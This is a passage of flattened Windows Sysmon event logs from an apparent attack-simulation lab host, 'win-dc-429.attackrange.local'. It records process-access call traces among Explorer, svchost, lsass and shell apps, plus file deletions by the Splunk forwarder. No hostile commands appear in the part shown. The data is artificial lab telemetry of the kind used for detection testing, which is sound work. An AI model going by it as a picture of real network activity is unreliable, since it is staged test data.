Files\Notepad++\notepad++.exe" C:\Program Files\Notepad++\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=8D93FF22077355875C7BC59CEBE98B4F,SHA256=A345288CDF2B0A43B64E0C3264FC2839A76C98835CAC1A1920D68E21DD444EB3,IMPHASH=D3A8B6DC8BC0179C654D96C4AD61A9D1{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x80000000000000001056442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.655{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.655{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.655{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001056439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.655{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001056438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.655{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.655{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.577{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001056435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.577{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001056434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.577{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.577{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.577{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.577{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.561{5EBD8912-8D2A-6151-9600-00000000FD01}46324580C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.561{5EBD8912-8D2A-6151-9600-00000000FD01}46324580C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.561{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.561{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.561{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.561{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.467{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843055CC73704D0451EB03C4EF578118,SHA256=4256D239096C09FCCD836D15917EBC4B3D9D398F11B3EC210ED96A6F465592D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.811{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E70595016552616C1237DE8CB69B72C6,SHA256=A68A00AE7B227F7F5F5C577CA33A42CF5DA7FC441FE06646D1D112657596F1A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.749{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BF9B58C04600CC23A0598A708195FB3,SHA256=3D27810FE486B394F8554EB2AECD659430D56F0BD7EB755E94B0ECC2376630FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.733{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=7B8C357E8586F51BE12D9E28566EBA6A,SHA256=F884C3D45C8563BA63B11BBA1CE000039A9321DF6B6B4CD3E7C2483C4E16337B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.718{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=7B8C357E8586F51BE12D9E28566EBA6A,SHA256=F884C3D45C8563BA63B11BBA1CE000039A9321DF6B6B4CD3E7C2483C4E16337B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.718{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8C3AE1C761569C4F980705178F6C5E2,SHA256=77B518F39FF9E43B34F90400DB23D56EE191F06E56C287602A38B1F99218CDA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.718{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=0FEBBDFA972060E7B35CB8C47577BF7E,SHA256=C5BF69C1EDED6F2F8997CD3BA843381E42779B9409642CAE7B4F538C7B22C398,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.639{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D4A-6151-A300-00000000FD01}6088C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cca|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.639{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D4A-6151-A300-00000000FD01}6088C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 